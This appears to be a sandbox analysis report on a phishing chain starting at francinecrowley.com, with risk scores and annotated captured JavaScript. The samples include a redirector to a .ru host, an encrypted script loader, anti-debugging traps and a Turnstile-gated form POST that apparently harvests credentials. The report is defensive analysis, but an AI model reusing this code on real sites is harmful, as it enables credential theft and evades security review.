URL: https://francinecrowley.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://francinecrowley.com |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk redirect behavior: Script redirects to a suspicious Russian domain (.ru) with obfuscated parameters. Uses random character generation and URL manipulation. Variable naming suggests intentional obfuscation. Location hash manipulation could be used for command and control or malicious redirects."
} |
// Analyst annotation (captured sample; code left byte-identical).
// First-stage redirector: reads the current URL fragment and navigates the
// browser to the second-stage host, carrying the fragment along.
// substring(0) returns the whole string, so the value keeps its leading '#',
// or is empty when the landing URL has no fragment.
SByaqYUyAIzREzjw = location.hash.substring(0);
let url = null;
// No fragment present: target is the bare second-stage path.
if (!SByaqYUyAIzREzjw.includes('#')) {
url = "https://jbGw.yzvufnxc.ru/SNNgfwO/";
}
// Fragment present: "#" plus one random uppercase letter (char codes 65-90) is
// inserted ahead of the original fragment, so the resulting URL varies per visit.
// NOTE(review): the purpose of the random letter is not visible in this snippet.
if (SByaqYUyAIzREzjw.includes('#')) {
url = "https://jbGw.yzvufnxc.ru/SNNgfwO/" + "#" + String.fromCharCode(Math.floor(Math.random() * (90 - 65 + 1)) + 65);
}
// Navigation happens here. URL fragments are not sent in HTTP requests, so the
// forwarded value never shows up in proxy or server logs; network detection has
// to key on the destination host and path instead.
location.href = url+SByaqYUyAIzREzjw;
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script with multiple red flags: uses atob() for obfuscation, contains an encoded suspicious URL (yzv...ru domain), includes anti-debugging measures, blocks security-related keyboard shortcuts, and uses document.write() for DOM manipulation. The code appears to be part of a malicious payload delivery system."
} |
/* The starting point of all achievement is desire. */
if(atob("aHR0cHM6Ly92ai55enZ1Zm54Yy5ydS9TTk5nZndPLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('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 |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script that loads crypto-js library and performs multiple layers of obfuscation (base64 encoding, AES encryption) to ultimately decode and execute dynamic code via script injection. The use of crypto libraries for obfuscation rather than legitimate encryption, combined with dynamic code execution, strongly suggests malicious intent."
} |
// Analyst annotation (captured sample; code left byte-identical).
// Loader stage: pulls the public crypto-js 4.0.0 build from cdnjs, then uses it
// to decrypt an embedded payload and run it as an inline script.
var ETKcefKWPmxmsSlD = document.createElement("script");
ETKcefKWPmxmsSlD.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");
document.head.append(ETKcefKWPmxmsSlD);
// Everything below runs only after the library has loaded.
ETKcefKWPmxmsSlD.onload=function(){
// The base64 blob (elided in this capture) decodes to JSON with four fields:
// a = ciphertext, b = salt (hex), c = IV (hex), d = password (hex), as shown by
// how each one is used in the next two statements.
var {a,b,c,d} = JSON.parse(atob("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"));
// PBKDF2-HMAC-SHA512, 999 iterations; CryptoJS keySize is counted in 32-bit
// words, so 64/8 = 8 words = a 256-bit key.
var tPFMznpYYqZakcgL = CryptoJS.PBKDF2(CryptoJS.enc.Hex.parse(d),CryptoJS.enc.Hex.parse(b),{hasher:CryptoJS.algo.SHA512,keySize:64/8,iterations:999});
// Password, salt and IV all ship alongside the ciphertext, so the AES layer gives
// no confidentiality; it only keeps the payload out of reach of static scanning.
// The plaintext is read as UTF-8 and is itself base64 (decoded again below).
tcdzyoZvgTgfirsL = CryptoJS.AES.decrypt(a,tPFMznpYYqZakcgL,{iv:CryptoJS.enc.Hex.parse(c)}).toString(CryptoJS.enc.Utf8);
// The decoded text becomes the body of a new <script> element; appending it to
// the document executes it. A script-src CSP without 'unsafe-inline' on the
// hosting page would block this injection step.
const NWVeyiNsRYBrpBLk = document.createElement("script");
NWVeyiNsRYBrpBLk.textContent = atob(tcdzyoZvgTgfirsL);
document.body.appendChild(NWVeyiNsRYBrpBLk);
}
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate cryptography library implementation (likely CryptoJS). While it uses complex code patterns, it's focused on standard cryptographic operations using native crypto modules when available. The code includes proper error handling and standard crypto implementations without any suspicious external communications or data exfiltration attempts."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var 
t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new 
r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA |
URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Running security verification to protect your browser.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is the beginning of the legitimate jQuery library (version 3.6.0), a widely-used and trusted JavaScript framework. The code shows standard module pattern implementation, type checking, and core utility functions. No suspicious behaviors or security risks are present in this snippet."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return 
this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Cloudflare Turnstile implementation code (anti-bot/CAPTCHA service). While it contains obfuscated/minified code, this is standard for production JavaScript. The code references known Cloudflare domains and expected functionality like iframe handling and error codes."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"brands": []
} |
|
URL: https://jbgw.yzvufnxc.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://jbgw.yzvufnxc.ru |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate implementation of the CryptoJS library, a well-known cryptographic library. The code contains standard cryptographic operations, module exports handling, and secure random number generation. While it uses some dynamic code patterns, these are standard for this type of library and interact only with native crypto APIs. The code is minified but not maliciously obfuscated."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new 
Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new 
r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "Script implements anti-debugging and anti-inspection measures (blocks dev tools, disables right-click, detects automation tools) and includes obfuscated variable names. While it redirects to a legitimate Microsoft domain (-1 point), the aggressive anti-debugging behavior and obfuscation suggest potential suspicious intent (+2 points). The combination of these defensive measures could indicate an attempt to hide malicious behavior, though no clear harmful actions are present."
} |
// Analyst annotation (captured sample; code left byte-identical).
// Automation check: navigator.webdriver is set by WebDriver-controlled browsers,
// callPhantom/_phantom are PhantomJS globals, and the last test looks for "Burp"
// in the user agent. Any hit sends the visitor to a blank page, so an empty
// result from an automated crawl of this URL is not evidence that it is benign.
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
// Analyst annotation (captured sample; code left byte-identical).
// Keyboard filter: cancels the default action for key combinations commonly
// bound to developer tools and view-source. This only affects shortcuts handled
// by the page; opening the tools from the browser menu is not intercepted here.
document.addEventListener('keydown', function(event) {
// keyCode 123 = F12.
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
// keyCodes: 85 = U, 73 = I, 67 = C, 74 = J, 75 = K, 72 = H.
// Ctrl+U / Meta+U (view source), Ctrl+Shift+I/C/J/K and Meta+Alt+I/C
// (developer-tools panels), Ctrl+H (history).
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
// Analyst annotation (captured sample; code left byte-identical).
// Suppresses the right-click context menu on the whole document, removing the
// "Inspect" / "View page source" entries from casual reach.
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
// Analyst annotation (captured sample; code left byte-identical).
// Debugger timing trap: once per second the script times a `debugger;`
// statement. The statement only pauses execution when developer tools are open,
// so an elapsed time above the 100 ms threshold is treated as "being inspected".
(function YFxiWctIgj() {
// Latch so the redirect fires at most once.
let UICQSFckEK = false;
// Threshold in milliseconds.
const MXLxhTRoCP = 100;
setInterval(function() {
const IYaOozQMbg = performance.now();
debugger;
const cqErKdldtE = performance.now();
if (cqErKdldtE - IYaOozQMbg > MXLxhTRoCP && !UICQSFckEK) {
UICQSFckEK = true;
// Decoy exit: replace() leaves no history entry for the phishing page, and
// the analyst lands on a genuine Microsoft host.
window.location.replace('https://exchange.microsoft.com');
}
}, 1000);
})();
|
URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long hostname, 2) Contains form data exfiltration logic, 3) Redirects to Microsoft Exchange (likely to appear legitimate), 4) Implements Cloudflare Turnstile but appears to use it maliciously, 5) Uses obfuscated/random-looking variable names. The pattern suggests a potential phishing or credential-harvesting attempt."
} |
// Analyst annotation (captured sample; code left byte-identical).
// Renders a Cloudflare Turnstile widget into the element with id "cf". The
// challenge acts as a gate: the next stage (HiMrHRXKPW) runs only after the
// widget reports success, which keeps non-interactive scanners from reaching it.
// The sitekey is a stable value worth recording as a pivot for related pages.
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA0L_ooW9uraju6I',
'error-callback': sxuNZDnQim,
callback: HiMrHRXKPW,
});
// Analyst annotation: Turnstile error callback; it simply resets the widget so
// the challenge is presented again.
function sxuNZDnQim() {
turnstile.reset();
}
// Analyst annotation (captured sample; code left byte-identical).
// Turnstile success callback. Flow visible in this snippet:
//   1. GET to a second .ru host acting as a gate check.
//   2. If the response text loosely equals 0, POST the page's form to a relative
//      path on the phishing host.
//   3. JSON status "success" reloads the page; every other outcome (status
//      "error", non-zero gate response, network failure) sends the visitor to
//      the genuine exchange.microsoft.com as a decoy.
function HiMrHRXKPW() {
// The form is submitted only via fetch below; native submission is disabled.
var ISeVIXBOQG = document.getElementById("bUBJLctuvz");
ISeVIXBOQG.onsubmit = function (event) {
event.preventDefault();
};
// NOTE(review): meaning of the 'CgCf' marker is not visible here; the form's
// other fields are defined in page HTML that this capture does not include.
document.getElementById("pagelink").value = 'CgCf';
// Relative path, so it resolves against the current page's host.
var cUqtrBXCjw = "../uokltBLIaDzv5yzq3yT3o";
// Gate request to a separate host; both hostnames are useful network indicators.
fetch('https://EWnx8xRi6zljjePfgH6kOLGqbYCqaXmNZJNu3WrsAGGglkpHxZlSvSpmCqi1.birsbunh.ru/ocHmiBJJRAOdSnZGLKNmsVgQdsyoAGFWYIOLTQWQATDZZPXKRJSAVZEMPED', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
// Loose comparison: the string "0" and an empty body both satisfy == 0.
if(text == 0){
fetch(cUqtrBXCjw, {
method: "POST",
body: new FormData(ISeVIXBOQG)
}).then(response => {
return response.json();
}).then(data => {
// NOTE(review): the reload presumably serves the next stage once the server
// has accepted the POST; confirm against a live capture.
if(data['status'] == 'success'){
location.reload();
}
if(data['status'] == 'error'){
window.location.replace('https://exchange.microsoft.com');
}
});
}
if(text != 0){
window.location.replace('https://exchange.microsoft.com');
}
})
.catch(error => {
window.location.replace('https://exchange.microsoft.com');
});
}
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge/security code. It contains standard postMessage communication between frames for Cloudflare's challenge system, uses known Cloudflare domains, and implements typical security challenge functionality. While it includes some encoded data (in md parameter), this is normal for Cloudflare's challenge tokens. The code follows expected patterns for legitimate security implementations."
} |
// Analyst annotation (captured sample; code left byte-identical).
// Configuration block for the Cloudflare challenge frame: it stores the
// per-challenge options on window._cf_chl_opt and wires up postMessage traffic
// with the embedding page. chlApiSitekey matches the sitekey passed to
// turnstile.render() by the phishing page, tying this frame to that widget.
